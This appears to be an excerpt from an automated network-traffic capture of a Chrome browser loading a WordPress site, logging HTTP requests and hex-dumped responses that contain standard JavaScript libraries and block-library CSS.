                                                        2025-03-11 18:02:56 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:54 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 5520
                                                        Connection: close
                                                        Last-Modified: Mon, 10 Jun 2024 12:48:07 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:56 UTC5520INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 35 2e 30 2e 30 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 74 2e 45 76 45 6d 69 74 74 65 72 3d 65 28 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d
                                                        Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v5.0.0 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(t,e){"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.449783198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:55 UTC579OUTGET /wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:56 UTC220INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:54 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 308955
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:11:58 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:56 UTC16164INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 6e 5b 69 5d 29 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 6e 5b 69 5d 3d 7b 69 3a 69 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 69 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 74 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 74 2e 6f 28 65 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c
                                                        Data Ascii: !function(e){function t(i){if(n[i])return n[i].exports;var o=n[i]={i:i,l:!1,exports:{}};return e[i].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};t.m=e,t.c=n,t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 28 74 68 69 73 2e 73 74 61 67 67 65 72 3d 30 29 3a 28 74 68 69 73 2e 73 74 61 67 67 65 72 3d 72 28 65 29 2c 74 68 69 73 2e 73 74 61 67 67 65 72 29 7d 2c 66 2e 5f 70 6f 73 69 74 69 6f 6e 49 74 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 69 2c 6f 29 7b 69 3f 65 2e 67 6f 54 6f 28 74 2c 6e 29 3a 28 65 2e 73 74 61 67 67 65 72 28 6f 2a 74 68 69 73 2e 73 74 61 67 67 65 72 29 2c 65 2e 6d 6f 76 65 54 6f 28 74 2c 6e 29 29 7d 2c 66 2e 5f 70 6f 73 74 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 73 69 7a 65 43 6f 6e 74 61 69 6e 65 72 28 29 7d 2c 66 2e 72 65 73 69 7a 65 43 6f 6e 74 61 69 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 5f 67 65 74 4f 70 74 69 6f 6e 28
                                                        Data Ascii: oid 0===e?void(this.stagger=0):(this.stagger=r(e),this.stagger)},f._positionItem=function(e,t,n,i,o){i?e.goTo(t,n):(e.stagger(o*this.stagger),e.moveTo(t,n))},f._postLayout=function(){this.resizeContainer()},f.resizeContainer=function(){if(this._getOption(
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 65 64 49 74 65 6d 73 2c 61 29 7d 7d 2c 75 2e 73 68 75 66 66 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 74 68 69 73 2e 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 74 68 69 73 2e 69 74 65 6d 73 5b 65 5d 2e 73 6f 72 74 44 61 74 61 2e 72 61 6e 64 6f 6d 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 6f 72 74 42 79 3d 22 72 61 6e 64 6f 6d 22 2c 74 68 69 73 2e 5f 73 6f 72 74 28 29 2c 74 68 69 73 2e 5f 6c 61 79 6f 75 74 28 29 7d 2c 75 2e 5f 6e 6f 54 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74
                                                        Data Ascii: edItems,a)}},u.shuffle=function(){for(var e=0;e<this.items.length;e++){this.items[e].sortData.random=Math.random()}this.options.sortBy="random",this._sort(),this._layout()},u._noTransition=function(e,t){var n=this.options.transitionDuration;this.options.t
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 28 76 61 72 20 65 3d 74 6e 3f 75 69 2d 6e 69 3a 75 69 3b 65 3c 30 3b 29 65 2b 3d 79 6e 3b 72 65 74 75 72 6e 20 65 25 79 6e 2b 31 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 65 3f 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 48 6e 3f 79 6e 2d 31 3a 79 6e 2d 41 6e 2c 65 29 29 3a 30 2c 74 6e 3f 65 2b 6e 69 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 66 6f 72 28 6e 75 6c 6c 3d 3d 65 26 26 28 65 3d 75 69 29 2c 74 6e 26 26 28 65 2d 3d 6e 69 29 3b 65 3c 30 3b 29 65 2b 3d 79 6e 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 25 79 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 76 61 72 20 65 2c 74 3d 4d 28 29 3b 72 65 74 75 72 6e 20 65 3d 4e 69 3f 74 3a 54 6e 7c 7c 53 6e 3f 4d 61 74 68 2e 63 65 69 6c
                                                        Data Ascii: (var e=tn?ui-ni:ui;e<0;)e+=yn;return e%yn+1}function A(e){return e=e?Math.max(0,Math.min(Hn?yn-1:yn-An,e)):0,tn?e+ni:e}function M(e){for(null==e&&(e=ui),tn&&(e-=ni);e<0;)e+=yn;return Math.floor(e%yn)}function N(){var e,t=M();return e=Ni?t:Tn||Sn?Math.ceil
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 22 22 29 29 2c 24 65 28 6d 6e 2c 22 30 73 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 74 28 65 29 7b 69 66 28 7a 6f 29 7b 76 61 72 20 74 3d 79 74 28 65 29 3b 54 6f 2e 78 3d 74 2e 63 6c 69 65 6e 74 58 2c 54 6f 2e 79 3d 74 2e 63 6c 69 65 6e 74 59 2c 74 6e 3f 6b 6f 7c 7c 28 6b 6f 3d 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 74 28 65 29 7d 29 29 3a 28 22 3f 22 3d 3d 3d 76 69 26 26 28 76 69 3d 78 74 28 29 29 2c 76 69 26 26 28 51 69 3d 21 30 29 29 2c 28 22 62 6f 6f 6c 65 61 6e 22 21 3d 74 79 70 65 6f 66 20 65 2e 63 61 6e 63 65 6c 61 62 6c 65 7c 7c 65 2e 63 61 6e 63 65 6c 61 62 6c 65 29 26 26 51 69 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 29 7b 69 66 28 21 76 69 29 72 65 74 75 72 6e 20 76 6f 69 64 28
                                                        Data Ascii: "")),$e(mn,"0s"))}function kt(e){if(zo){var t=yt(e);To.x=t.clientX,To.y=t.clientY,tn?ko||(ko=P(function(){St(e)})):("?"===vi&&(vi=xt()),vi&&(Qi=!0)),("boolean"!=typeof e.cancelable||e.cancelable)&&Qi&&e.preventDefault()}}function St(e){if(!vi)return void(
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 61 64 22 29 2e 61 70 70 65 6e 64 28 65 28 27 3c 73 74 79 6c 65 3e 2e 74 68 65 69 61 53 74 69 63 6b 79 53 69 64 65 62 61 72 3a 61 66 74 65 72 20 7b 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 3c 2f 73 74 79 6c 65 3e 27 29 29 2c 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 6f 2e 66 69 78 65 64 53 63 72 6f 6c 6c 54 6f 70 3d 30 2c 6f 2e 73 69 64 65 62 61 72 2e 63 73 73 28 7b 22 6d 69 6e 2d 68 65 69 67 68 74 22 3a 22 31 70 78 22 7d 29 2c 6f 2e 73 74 69 63 6b 79 53 69 64 65 62 61 72 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 73 74 61 74 69 63 22 2c 77 69 64 74 68 3a 22 22 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 76 61
                                                        Data Ascii: ad").append(e('<style>.theiaStickySidebar:after {content: ""; display: table; clear: both;}</style>')),n.each(function(){function n(){o.fixedScrollTop=0,o.sidebar.css({"min-height":"1px"}),o.stickySidebar.css({position:"static",width:""})}function i(t){va
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 2c 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 32 7c 7c 6e 75 6c 6c 3d 3d 3d 6f 29 26 26 28 6f 3d 2e 31 29 2c 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 33 7c 7c 6e 75 6c 6c 3d 3d 3d 61 29 26 26 28 61 3d 21 30 29 2c 74 2e 62 69 6e 64 28 22 73 63 72 6f 6c 6c 22 2c 73 29 2e 72 65 73 69 7a 65 28 73 29 2c 73 28 29 7d 7d 28 6a 51 75 65 72 79 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 2c 61 3b 21 66 75 6e 63 74 69 6f 6e 28 73 29 7b 6f 3d 5b 6e 28 30 29 5d 2c 69 3d 73 2c 76 6f 69 64 20 30 21 3d 3d 28 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 69 29 26 26 28 65 2e 65 78 70 6f 72 74 73 3d 61 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e
                                                        Data Ascii: ,(arguments.length<2||null===o)&&(o=.1),(arguments.length<3||null===a)&&(a=!0),t.bind("scroll",s).resize(s),s()}}(jQuery)},function(e,t,n){var i,o,a;!function(s){o=[n(0)],i=s,void 0!==(a="function"==typeof i?i.apply(t,o):i)&&(e.exports=a)}(function(e){fun
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 65 3d 68 65 2d 66 65 2c 79 28 6e 65 29 29 2c 56 26 26 28 72 65 3d 4d 61 74 68 2e 63 65 69 6c 28 31 2f 58 2a 73 65 29 2c 72 65 3e 57 2e 76 65 72 74 69 63 61 6c 44 72 61 67 4d 61 78 48 65 69 67 68 74 3f 72 65 3d 57 2e 76 65 72 74 69 63 61 6c 44 72 61 67 4d 61 78 48 65 69 67 68 74 3a 72 65 3c 57 2e 76 65 72 74 69 63 61 6c 44 72 61 67 4d 69 6e 48 65 69 67 68 74 26 26 28 72 65 3d 57 2e 76 65 72 74 69 63 61 6c 44 72 61 67 4d 69 6e 48 65 69 67 68 74 29 2c 5a 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 72 65 2b 22 70 78 22 29 2c 4a 3d 73 65 2d 72 65 2c 76 28 4b 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 2c 6e 2c 69 29 7b 76 61 72 20 6f 2c 61 3d 22 62 65 66 6f 72 65 22 2c 73 3d 22 61 66 74 65 72 22 3b 22 6f 73 22 3d 3d 74 26 26 28 74 3d 2f 4d 61 63 2f 2e 74
                                                        Data Ascii: e=he-fe,y(ne)),V&&(re=Math.ceil(1/X*se),re>W.verticalDragMaxHeight?re=W.verticalDragMaxHeight:re<W.verticalDragMinHeight&&(re=W.verticalDragMinHeight),Z.css("height",re+"px"),J=se-re,v(K))}function d(e,t,n,i){var o,a="before",s="after";"os"==t&&(t=/Mac/.t
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 76 61 72 20 6e 3d 66 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 2c 63 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3b 68 2e 73 68 69 76 4d 65 74 68 6f 64 73 26 26 28 22 2b 6f 28 29 2e 6a 6f 69 6e 28 29 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 77 5c 2d 3a 5d 2b 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 45 6c 65 6d 28 65 29 2c 74 2e 66 72 61 67 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 2c 27 63 28 22 27 2b 65 2b 27 22 29 27 7d 29 2b 22 29 3b 72 65 74 75 72 6e 20 6e 7d 22 29 28 79 2c 74 2e 66 72 61 67 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 65 7c 7c 28 65 3d 6e 29 3b 76 61 72 20 74 3d 73 28 65 29 3b 72 65 74 75 72 6e 21 79 2e 73 68 69 76 43 53 53 7c 7c 75 7c 7c 74 2e 68 61 73 43 53 53 7c 7c 28 74 2e 68
                                                        Data Ascii: var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+o().join().replace(/[\w\-:]+/g,function(e){return t.createElem(e),t.frag.createElement(e),'c("'+e+'")'})+");return n}")(y,t.frag)}function d(e){e||(e=n);var t=s(e);return!y.shivCSS||u||t.hasCSS||(t.h
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 69 22 29 2c 6e 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 2e 6a 6f 69 6e 28 22 20 22 29 2c 65 2e 73 74 79 6c 65 26 26 28 6e 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 65 2e 73 74 79 6c 65 29 2c 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6f 70 74 69 6f 6e 2d 61 72 72 61 79 2d 69 6e 64 65 78 22 2c 65 2e 61 72 72 61 79 5f 69 6e 64 65 78 29 2c 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2e 68 69 67 68 6c 69 67 68 74 65 64 5f 68 74 6d 6c 7c 7c 65 2e 68 74 6d 6c 2c 65 2e 74 69 74 6c 65 26 26 28 6e 2e 74 69 74 6c 65 3d 65 2e 74 69 74 6c 65 29 2c 74 68 69 73 2e 6f 75 74 65 72 48 54 4d 4c 28 6e 29 29 3a 22 22 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 75 6c 74 5f 61 64 64 5f 67 72 6f 75 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c
                                                        Data Ascii: i"),n.className=t.join(" "),e.style&&(n.style.cssText=e.style),n.setAttribute("data-option-array-index",e.array_index),n.innerHTML=e.highlighted_html||e.html,e.title&&(n.title=e.title),this.outerHTML(n)):""},e.prototype.result_add_group=function(e){var t,


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.449785198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:56 UTC602OUTGET /wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.449786198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:57 UTC607OUTGET /wp-includes/css/dist/block-library/style.min.css?ver=0b25e1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:58 UTC206INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:55 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 114706
                                                        Connection: close
                                                        Last-Modified: Mon, 23 Dec 2024 13:58:53 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:58 UTC16178INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61
                                                        Data Ascii: @charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-a
                                                        2025-03-11 18:02:58 UTC16384INData Raw: 6f 75 6e 64 2d 64 69 6d 2d 38 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 38 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 38 30 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 38 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d
                                                        Data Ascii: ound-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-
                                                        2025-03-11 18:02:58 UTC16384INData Raw: 61 64 64 69 6e 67 3a 30 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73
                                                        Data Ascii: adding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks
                                                        2025-03-11 18:02:58 UTC16384INData Raw: 6c 2d 6c 72 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 34 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 34 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d
                                                        Data Ascii: l-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=
                                                        2025-03-11 18:02:58 UTC16384INData Raw: 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 5f 5f 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 38 32 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69
                                                        Data Ascii: .wp-block-navigation__submenu-icon{margin-left:auto;margin-right:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navi
